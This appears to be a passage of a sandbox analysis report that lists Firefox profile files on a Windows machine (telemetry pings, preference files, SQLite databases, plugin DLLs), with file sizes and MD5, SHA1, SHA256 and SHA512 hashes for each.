dfe7a6b622cf04cd3a8562ec063a747d

SHA1
722b35ab42854cbf00f7735bb59b55bb787f7dd9

SHA256
a5ad15ef366dd470647f544a0496f4476d0531c4b654415951db2dc5bcf7616d

SHA512
6e6471481375afa9daba4bd62885d3f3389579772ed75ef1d8cbedbbc9e1f567db0babf31e1b03d2a566d0d2950389207de7e02db639914730ca49b1d9782aa2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
78KB

MD5
233bf0c6f9694bd3fba800051c58d150

SHA1
c855871622cb274b0522849cd49732c22f1220c8

SHA256
59f0b5dc32186471f656a2783299bd6df05235ae29c00582ed1299215c915ffe

SHA512
c9016b8157a268643bc5d6317b0cbc3db23bf0573e4545086361e2c5f2237d08b870632eebe0a49bcb976f956ebb8a459e182ddb1b2c3234d9145a70c87b85db

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
122KB

MD5
72b3faf44d317c3be315954fbbbabaf2

SHA1
33335d7e430b283e5336c76296090038b689a692

SHA256
0c372a497ed401f90563d3df6a35b62897e5223bb0576b661859371ba32186dc

SHA512
4bb165596642ddbeebcf974acdc95bf9af3eec6b8037b6236d8f289616df26c903a9e23adb0f4f980cc63e24e9cdd233142183e16dcd76f2b03877e091a96268

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
93KB

MD5
324985d17f901c0dad80c86fc29650d5

SHA1
5234983dd53f2cd34b1bd95e20451d72aa5fd25c

SHA256
fd042e1bfd50f158f2a013e293bfce055454134e512b244f484c4f45723e0d20

SHA512
f8a0d4ad19de4be74d3dca30b6ea63b87bc84275e142d7ed612554394cf8a49ae53464a26bb396945e30ac9fe6092cbe8b6592044edbd81da83921a455251ed9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
79KB

MD5
d1c94160c0a027fb551b33314b924611

SHA1
6df86ba24f783df716f3706593b25eb34021cc1e

SHA256
977775a9e49bf59ebd3fc1ca978d680255cd452e5e9ce854b872c5ba0d9dfc07

SHA512
fb6216a91b39f43dff81340acdd2bda4fd90a4821c0548545c9f18ba3dbfcf76c9c372908519c4062fdfc693953527f058dbeb550d4af538bdbf34106782b223

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
71KB

MD5
d23d75c1ca1278bf38753fd64e390791

SHA1
ac64218cf20811ca189ee634113eea82e7c98b5b

SHA256
63b6bc01d83031fd459095630e7a2516ecdd74b27e5341a905b44bc69e012c97

SHA512
18e324f59b8041918f7a24d955e17cff7ed093a416bed8902f41172cf158bcc1b38cde5434004592a20a1e0f51227adf14c91630cc37ba1c93d64d747fa22693

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
79KB

MD5
51494545ac1e79ba4decc0cd1a60b5a0

SHA1
c5b4f6e6df044655fe9d4f9a02fd8c97267f49b2

SHA256
8248f5d9ce11eae9b3876773b6566c944924d2d7306afc7377bafd70e7357b20

SHA512
2f82e49806075653825d86f27ccf33e9c5d3cbfb1c00df625c98025f1e9809c3a2fd7dbf3221ef6d91537b79611f1ebdd5886ba372e0dc574153035deb98c507

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
78KB

MD5
8ac69899a8419e8adef1d777cddf0700

SHA1
64bc2c096f35264e6a8b549a1e708adfed352da9

SHA256
0a0b9a58357801362544ed7cf74977fc3bcc4fbdf4c73b23a81f326ab8ead1fc

SHA512
d73bfba82aa9fe38b714efd133a15762ed57097cd20c2d1a9d56d9c4bbbc7c96b567487da8e9a4bc49f7061f3be2d50f91e2271d0304a85b8116935d3c3a3daf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
4bbdeedbe95918e167c624dfaeafa45d

SHA1
410d5a191eb60130c74fbd927022f3df18abde7f

SHA256
6418ad13e261380fb54248e5693b7eacc80c94bad240308dc349bbc5b29ab29c

SHA512
c6f0736bef112b4fa688044520d7fc3bf2b8d706ff2973cf262f2d9494383a1e86c089f4df9dfefa96c6d98d363628ec2532741e9989721aa17d8332c89bb21a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
18KB

MD5
24d7c3c9438d4024259061350d63c88c

SHA1
3d71d17896d41904fdd95ec3adc2e80c8f097a92

SHA256
57fddd0f441ed90d986efac72d4527889bf8f96eda46bccaed2fe5f9815d8508

SHA512
597839154e366fbe6e3e4cc8539404c6648a425817acc46a51acc09083a975538592724084a8ae2f2a703cc428141e9067b4b4c569ddfb29d29498bd8b733fb5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
18KB

MD5
ece2184dbd2f052dd916246cf88c4792

SHA1
f00fda0e343b21504783d569795539b2cde797a6

SHA256
a436df9742caa69fd395705038500cc76d3de7cb924a473fb79c3815fb4f3c6a

SHA512
b2e8b911b735ac94dcf2b54b30fdc565b7debe084ce9bf301167c9a1d4da0eab4b22aacdd082aa0b62aec817aef036ecd1036739d8bc69c754329e7e12558896

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
71KB

MD5
b37a24fbe9cdfa481f20ceb850952357

SHA1
ac3eac3d1edbe9f956b076cadfce197014784ae7

SHA256
8fec3425de9e20cdca9391d1b0d2acffaab300b92677a06c639c288459ad49b4

SHA512
b21ac9f3c29f8802add0903b2bef1b9922a0912f4f9fbbe787dec5f2fccc8e6e4cfb9a914a51ddad6c2572908277762c533dd6b2054a958dc80acb4db50f7231

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
71KB

MD5
dd18bb62ecd6491c12df0ee137c4b19f

SHA1
831f0a710b61e1de824c4d8491afe641fbe93151

SHA256
148385ce4ccbccca2d7f5e4a4cd17b7b76cfd3017c6a4f9baa69b72569647916

SHA512
8aa68c528db1da4531af667871d7cc4aad45ceb2e6db3e75a7c4421c2d569607ccab6248ee23b737c4697a83eccc67286ec2e5daa72127283690897fa1aeb55b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
77KB

MD5
3afe8269814ccb43579638316e3a0048

SHA1
83b48162f165502189e86af9a48e6827cb26ef78

SHA256
6897970a4702e6974da59bfcacb511a786ed08596500724bd2d25ea7d6bb98c8

SHA512
f3eab7a97451dccd0aacc4dccaff6fbbb7ff700cdfaf34c209a05f70d684ce5f1182396f27e5aaff4654b2734bc1ec8f50b0c4bc57493175d2f17b5b8522954a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
77KB

MD5
1727f41b9e87c11cf890f1874bc87abd

SHA1
2d492932eb98fda4f68d4c77243ab66988951bff

SHA256
1a679cc744cde44bb641f1b8f2290e3ba273cb320b92fe9624cadd291dc18c82

SHA512
238545d3ab23a90b4aa342e1f4d113a2befdf50e94aa5f6315a1dcf5b32c71a1d9e021fdc279afaf0b3ecd1e47537f359e3e227846af961a2e954aa5515cb330

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\events\events

Filesize
104B

MD5
defbf00981795a992d85fe5a8925f8af

SHA1
796910412264ffafc35a3402f2fc1d24236a7752

SHA256
db353ec3ecd2bb41dfbe5ed16f68c12da844ff82762b386c8899601d1f61031d

SHA512
d01df9cab58abf22ff765736053f79f42e35153e6984c62a375eb4d184c52f233423bb759a52c8eed249a6625d5b984a575ca4d7bf3a0ed72fc447b547e4f20a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\events\events

Filesize
640B

MD5
bbfb85d37539b1b64baa5045aa28f9b1

SHA1
20b5d11767a090ed06bc4b79ce776ada17f59788

SHA256
98dc8fa7d0fe4b46f017f924607025716ac3b33c72701c1be4a2b8176a3f1373

SHA512
f2cdabe3e9bc358315cd9f03f879a06d9deb31583e54003afa2b663207dc9055fce7a91afd11a76a421bfb0ff42e012721c4bf890bef33d48c1e0922b48bd7e9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\events\pageload

Filesize
2KB

MD5
ebfedbfce09c415d9ae380570d632c5a

SHA1
f2dd56b2605b02598473ead594878082f1aa2835

SHA256
6551021c52942c16cb4d2407d092b47471b4bd46a9630ac5e207e224722c2777

SHA512
87e6c06d57e11be5ec5deaf3360b4632888ee7ea04fa2fb6be8644118643d50a10215944b975ec80c5e7cc310a4488b78b43272064b906db62eaa8e3476a9205

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\07f25161-9ca7-4121-b2cd-555da710a4ff

Filesize
982B

MD5
c720847a9e0e1b24697f867a3e71ad22

SHA1
18115e4d33a37db2c5bd702de03b99e4f0061964

SHA256
ffc7a989bbe585543de1bb48a08c4c181b5159714be7a05cd2e1c29e4e609b22

SHA512
1b7b74a0166a42faa516aa27f51fc171bc2a9c4d905f9d42034d14edec9a9f883e0bffdd12496897c6268365fdcc9301d0613d8fe0c4736e4d50764d15e0607f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\0bb32aa9-2528-4c94-8749-c26dca9060c6

Filesize
1KB

MD5
4bd3d706822b3d4b2eb8bb583317c93a

SHA1
a2c217db28a38623bc6d4d177e09ddf1e88c502b

SHA256
c4e2e34cf28750615cf29927c1a2e392290a43fabe2311ca1cf7bfd3dbd0f733

SHA512
354203353384a7f92149e8a00553248439bcbf7ec5c4c3b57be258e3f46b5c7cbf1e78efd6224ad3fd538ffe16bf6ec1183561361888facecd1e80fe739ac4c6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\13347696-3d9f-4253-96bf-4e18340c19b8

Filesize
735B

MD5
302ca3d25062519b7e5aba28a6755927

SHA1
1ee64861ed81ce0ed12a3f6caafe17c667189a98

SHA256
cb74c808bc5807146f365c1dbe94a79d1c0cab66b3477fc02cc550ab9bbf16f9

SHA512
bf0a8e0c6940048a0fff8342e74b50c80b867acd34d4761056661da64986b508db498b10ac3de76587e8fe4c0124115a6ab105889aa89e6832d8e808807a98ab

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\1a4da7c8-9c22-4ee2-8e50-ed4ef4c64b76

Filesize
676B

MD5
f3613814048c28041f896124162d08cb

SHA1
85f9084b6dde0fe9da2a287aadf8a61319d50877

SHA256
a1642ea6746fae41607a83c146a1678a0ecc664389b33aec358b607c52c85bac

SHA512
36b6aa0188a20914bd3bce22b247bb148f7a556b3a7876175aedb1ea41f1478e29dc402aee5acaecffe9167209020b1303036d94ebd98fec641d4fea66beae8a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\49db175d-8e16-4776-8fe9-0303dadeb9c7

Filesize
2KB

MD5
afa3380ffec128d5c5df623029d128a1

SHA1
15c542b482c739b3a7c6ef3fbee7b4873a377d4f

SHA256
6b3e6537623b4a502d43c43e20f12e8e1a7aebd0eadb855ac7a67066c4e54f64

SHA512
9cdd971542d9470db76b763ce5d88d5d2ff4eeabbeb005e1e7b1cd44e133376a711601844fe71e459381e1d2e2e33fbd61aec1457244017f8581612d1f29f055

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\4b6bbeac-c7a0-44ee-b84d-e9a502689c7d

Filesize
847B

MD5
8d6415422360bc574e18e27c3c0ef513

SHA1
91dff34911bca1b936ab731df50fe9387c32c9ec

SHA256
d7ab93f7b3cb7c78eeef74fb13f43949d8d82c155452f776a5b2f8b04b4fd986

SHA512
b1abb7586c002c49014ffc69e5e5d71a278a3dc206746cebe504780f221299c4b748fff8ec2a4d8840ca153bd88527c2f23beaf6c7f7d75ab9c53e9779fd4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\63702822-e017-4544-9ae0-7332902ce43f

Filesize
982B

MD5
3919edafc468bf18cd0b9b3d099f3561

SHA1
c620cd5206def13adba9cd5378088c1e61865aeb

SHA256
aac9dab72853a7e3ed1df0dc9f27a25c7f3dbad1c9a4a9e70d05bbda253af6f6

SHA512
b3daf3d912b61aae1cee6aa54f295c892940af3b58975e584055f5a5913199c761870efd6cfa3b69daf9c12891023795f397cf609d3043aa34895a17d41d6a30

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\67f1cc32-a50e-4c4d-aaa5-272fd287fb2e

Filesize
671B

MD5
0e9975c4d6bbe58bc504e18bf1568e56

SHA1
a8a113d296144281c8ce10df0acc748a99986b9c

SHA256
6e164237819d19202aa8d45d2f67fe81353174741f7d5427f8391599e3964891

SHA512
0973dbc08a4b9a8dcf0de8a919090410d23b4c693e87c920daae3c2d7baa016d804e3fc86027a7ea8a92466e09b81de17214ecc1d0ba18c75ff6944220bd2ae4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\6aa4af8b-d008-4096-9967-72eaac09e701

Filesize
4KB

MD5
27142f89b03a961215981525339d72d5

SHA1
ee8cffac60d80b9a065c14c9308af3cbea5aeb93

SHA256
2fe3e5e85617e17f97c6ff563ef5fcf415a2b3d36abff4f2a49fe737361cc2fa

SHA512
e04fa71e7272ba701214709f039e271f6036046549e45ee959faeeb660e3423c4c0298d5c92b8f64374cb12ca2cba0d65f6c935f90d90ae0383700872565af72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\6d5f0126-d53d-4ab9-a0f5-21bd78cbabe0

Filesize
39KB

MD5
eef4fcabba3084a194dee2547005bbb7

SHA1
d408c28329a532d47df26522b37bebcccc1f27ee

SHA256
10c0838ecc57e4b257ad610b675c3bc1d946c70aa5fc9518789bacd949da8561

SHA512
45e6b40eb203194dd6d8290ce91d9b3226542b0cd9ab3897ecf56257ce481338289824aa98657bdf57f8243443d3df0f2540ca2ed02ed1506ac68813a10cfb4c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\a9839df3-b238-4132-89d3-860d3ace04f7

Filesize
5KB

MD5
522afeb7f7e286222093925519c1f4d5

SHA1
7a3ce7524c9380ad438424c3fb67e0cf3fba1ac5

SHA256
8f1ae7c0b85cff41f6e8b8db6ae7a0016802df7a6e2c00b7aa7630122eb7181e

SHA512
921a0d30be18585865869d555e1555acb43bc980ba86041e5ae31a497c9cf8078ca3a45f2ecf38fd13d1712742f12c7dbda027f349ce5c3396d71c5462436f0f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\cb3f01f2-d89c-4f64-8c7d-82d73ca50ee9

Filesize
2KB

MD5
0cdbef4baf076e5ca85e1ca2bd7b8180

SHA1
74fb381608b2f9857492d4d130b3a5c3c072ecf1

SHA256
c131380576328343eeb21b338b826b2bc277fa1be57ea3d0c02851023e0dea17

SHA512
73ad0c39029d227aa336edbd2253dbb216a3975f79f26d29990c20340f7c5d61e0c464c71d54679bfd10419a13198ac9ba1d0b353d95c48e0067fc23b0748429

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\d4404487-20bb-4c57-942b-7a33a7346c0f

Filesize
26KB

MD5
f8632bce2153d6aad80893dcb670d6b2

SHA1
6bfc6e891891164a91b88d0439f9a953edd92e97

SHA256
c98c0a5591a790106f8d49199d0c1812f4cb4deb30e4ea131f23e5e6a9cdf03f

SHA512
6de5e1e5933130b91361740a605e5ddf420149ef6a41cc92b295b8a536639b685cc07568437a16168093132c73e09f8164f51363e0141e1baf29b38a46c68796

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\pending_pings\f421410f-8d59-4a7b-a5ef-6c9ba1efc9ae

Filesize
735B

MD5
2d6d23cd47074191cf2685017387326e

SHA1
749512c4545e63f1fac09e4e0a25be9791947fd2

SHA256
9f757899b581bc8fd58d827c43025b76ce46cac88830a8b1c120ecf9e78480e9

SHA512
b4c2d69fc0eecf3ae8e522003ea765c20dee071315d938b868353de3d380b13dd2b68b1f414418f3ef6b6d3c9ebe6fc4856c78fe39ed8bbe6ea91b75d19c2b80

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\extensions.json

Filesize
37KB

MD5
81e1fd19070d16a5a490edebbea70a7c

SHA1
8dbadecc984518cef2ba64f419f105da3aa550a5

SHA256
f4c0d28284ee81d9052429969661b642b4d02c760cd78ea1d19a2a4aa0405e1a

SHA512
709ad49ec8632818a30865224fef7a969e527fda03ca03a545716c81e7aa1c99b5e97095289a666642f36c435caf91273fc34d1e5ae349ddbd83d250d86fd434

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\favicons.sqlite

Filesize
5.0MB

MD5
5ea66a45563926c11c4351563e144ed8

SHA1
95633b49651c2a35e76cf7387a70683afe2ba6ed

SHA256
207fb9e6c7e8a2497eb3a76b8fdfe3167afbdde35acb7cf4ac2fb0f3e4f77b9d

SHA512
5071dd5523b091430976727bc8962ed29f0bdd1360c55b5c21d25a5f10187b3c03695f68ba92e08b6bd480eaafb1f93fda3a3b894d00e1eb724eb331e7a6b0a4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\permissions.sqlite

Filesize
96KB

MD5
69a9c8ceb4b78fc6bca68bef32f4557b

SHA1
4774d62737d6a5bddbbf05c5a0622b5f8d59f7dd

SHA256
9a83782a665b9eb00e08fe0fefad33006fdfa93f0b602c6f760fd2dddc3daa35

SHA512
b2838fa39a801717484260a0cc3b2feca74d2f0437e6e7e6492a78c945633b8e725dd11bec18a3afa0ddffe7b2e8c83f470c307ca900455272890444dd9eedd8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\places.sqlite

Filesize
5.0MB

MD5
bc72d893c9017eebe3a23889c4370934

SHA1
e2cb4a217d2af7bcee7bb41f69727392580d09db

SHA256
82676227762c2f0983b80b4ac74189c0b43de74f741000f78bd383ea24f71ea4

SHA512
54f438d3ee2165f4e12eb782b77b3ad3d5a84d749e98b000923a4c25f9f649c1acf0981dbc661d22e5f297ab91939ce0e65de42c13f1eb32bea7d1c53cad4f31

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\places.sqlite

Filesize
5.0MB

MD5
eba5d7a52e787df62a1a0b957ecf5b0b

SHA1
7b1f23e4c90770e02533986eca1323eafde0abcc

SHA256
814c95b373fd1377f0dbe6b3eb5ee88e1812735acb9199b95107137669d2b533

SHA512
d12437a78f57b97023a906b35d2feb32d9d35bd7e68ae588bcb187c5e8a1b3ca1865a772396eb31537d46a05d7150cd8b22d1defcb58f8e7ce66efd2392c55fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
15KB

MD5
15e28daa77fbeecdb165d253647983bc

SHA1
ceebb56bb981c8718e011ac9ee748afda32571c5

SHA256
5447cc5da1ce69034a65269f5df0385e4cf7b2fdfaaa457df50db72767fb602b

SHA512
ea9f5788b4dfeb2f8555fb069aa51b2cc29232aba31cd89a93ef9d598f4ef927d29110e9a8d0adbda68c3527c4724751ce874b5015cdabf65d23c1fdc8bb5496

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
16KB

MD5
9c42e4aded843400e8f41709821e1364

SHA1
df0cd26052f678c7f58ac260ae5f8fc299eaad23

SHA256
656cbfbb04df616670bca3a5b7e34b4fc6fadaadd41aa2261c3126f5f23b158a

SHA512
24247e96832ee9c692b4afee440cda9df594920847d48e34978cd1614e4fbed60a5ccc562202993a1d682346b2da7b42085989b2d3cd26bdd8f6b057e8ba7458

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
10KB

MD5
9b74ca502da2af234629ed0e5d886a53

SHA1
2f2c00a6049a965723bb16caf374286e66492ac0

SHA256
d9c267dee4bc4dd02338031f77b6fcbb8deb16118c13609d95c9f277a8fd2d62

SHA512
6ed9c86fa3a8f885ca3795eb97c13623ee8fc590c41a598799b8d040e0327780943321e6f036122151f5ea73819ffe6e345d5ecf7d703ff13a8c74f41adee7fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
12KB

MD5
2443b0036599d0abe50dacb1e81aa114

SHA1
96b9a748c3efccee1fca0392fbb36b3957d5481e

SHA256
66f868c9a6416c1b3bea00b8fdeeae427969fd111164928214a53ae0b52081a3

SHA512
f5e7d83f004a1e3b8fa9ff3c739d31883681ac356ac69526cd91c21948404165fca72a992329b4208a6bce5eb90e0c443557cda373b57aa7d712ff5998fe25b3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
15KB

MD5
7f335ae326fc13f43670cd55c3953444

SHA1
5c323ab1424d6d5b226243ebcffe6326bdfb6f22

SHA256
aac5cf4d47b3320cb514a566d662c5fbff5c9f86ed58745ecc46975626e14804

SHA512
182cd9471d61dd449978250ca94fc5dbaed97938418d34c1b00c2b40ac01a101c2485a2844045389820741fee85ed80f490ea601a153281cf60f627f58d54880

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
15KB

MD5
1bbc49a0be6eb5757e82121620d6be7f

SHA1
a37206bc08520a52e5f153b70b5c17e1afca571e

SHA256
b2b3b594962fede53fe9e76665b7d9d35178adc668b89ab90ef1ac84f83780ac

SHA512
b7ca7393a6d8ba2fd09209f4d35e708e3bf81dd36c85f27112bfabaf304a5e99c4eb2bcb701f87aaee0b9d4572f65baabf6c0972bfb59069bf7ce72c768828dd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
16KB

MD5
9de5821796df31f08731184659275584

SHA1
273d5d553b7779b697d3d16369ed226111c9dde9

SHA256
6913e321f0e81e55f6b3e5ce9fdc5b2b837d23a8d86d7d20547b769cd0e05188

SHA512
32e0b9757188cce33a9b85f0e3917ffd9a66b0a403e7e17801a253b96fcd6e7fff585c0fd0ed2fa702f48131a01424d45ff2d3fc916409244e0e560bfeafb905

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs-1.js

Filesize
16KB

MD5
9214e876e07772a1136c812ef39e7050

SHA1
24557e49a3a83b0ea81ca00dd8f0beef8af6264b

SHA256
6f513a230f7193ec25b6a8c28a346dcc7c6fc9dddd41263f7126da6b9588ae20

SHA512
c6cbd626063835ba60b19c33a361168ff0926b4c9a243008f743745f64db27ef7bfa359b8e29ca3b72459ad35858807b50dcdb6483b492f10746f447c1217763

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs.js

Filesize
10KB

MD5
80fb00018c75ea25f8a55e0a38e7ac5f

SHA1
d07d38b10485925a5f0acb5ef097fc69b5894f5e

SHA256
e823b338cf167f8128a74b911bd83402e88a8c9f2684a6c2609bcbdd5d2d7ef6

SHA512
c5d9c0c505304648ff1e5e8030ce034fd57bbd2e6dcb2dd140fdbae2f6bc6da946f09dfc9e7221c7bf8da8ee9b30f4f5e56c8ba762037f9c3a3cb6cc866e3c94

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs.js

Filesize
15KB

MD5
f69dcb89c80019eafff1c45a91886040

SHA1
3fb4aeac663d56bf9b43194f77660c750d9dad61

SHA256
70457b39752b15bd84021ffdda0a6046f213d83b65bb876670c0598cf97d1918

SHA512
376e27cb54d07d15096f82b519186c06d6840c26284b981f6e935b8c2a7af9609df41518141a09ade0b3daf4765579b1594c8ec1d3ec7d8ae23b2178d9c2a2c1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\prefs.js

Filesize
15KB

MD5
ce3d1dfcb8ade012a59195c830eadffb

SHA1
e552bbb5e6553cfd93739d637df101999070eadb

SHA256
8bfca598e9a491b8f76af394a10ca6fd4afdb2bcf7696d0db8a3e05828fe1f87

SHA512
7e5df81f80a34b6c5c64a115ced21fd362bd1df78abcdfc8ab739b7e0cbe8785f7058c56370a65ea2a6c98f21f02768592d0f6458c9cf19375e4e8b54a96c8be

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\protections.sqlite

Filesize
64KB

MD5
4427f78ab76667f9d753c301bbad3a9a

SHA1
d2c4856a83e5000cb2295c2b2d1651387c79e7e1

SHA256
b721ecb5c17fa1d1865c5c4e66f86f81efcfa010295e5515ac0f5e8fba5413c9

SHA512
27e57f37fdf0e49379ee63ef38e93144ffef0305722e7e295b04379582554873788e45507da82822b7db80ac1b55587bc2d6a8fca98d87d332d10c4cbabce68f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\security_state\data.safe.bin

Filesize
2.9MB

MD5
fe0a606435f4e3d059182df1d90bcf7a

SHA1
49186738f6f4e627b9dfa32f2fcfa6506eb3a6b4

SHA256
08d9842956a182b42a29013ccbc72386167dba9f29be7e175e6dedcead39925f

SHA512
17631d9e2c4e1fc036ddcb0ea43a85324023c6ecc277e0808252d0d4e41545ebab81aa437313e7b57bb865c0ae04f6d15e60bab6f30a31faef61c32de64e5f27

Download Submit
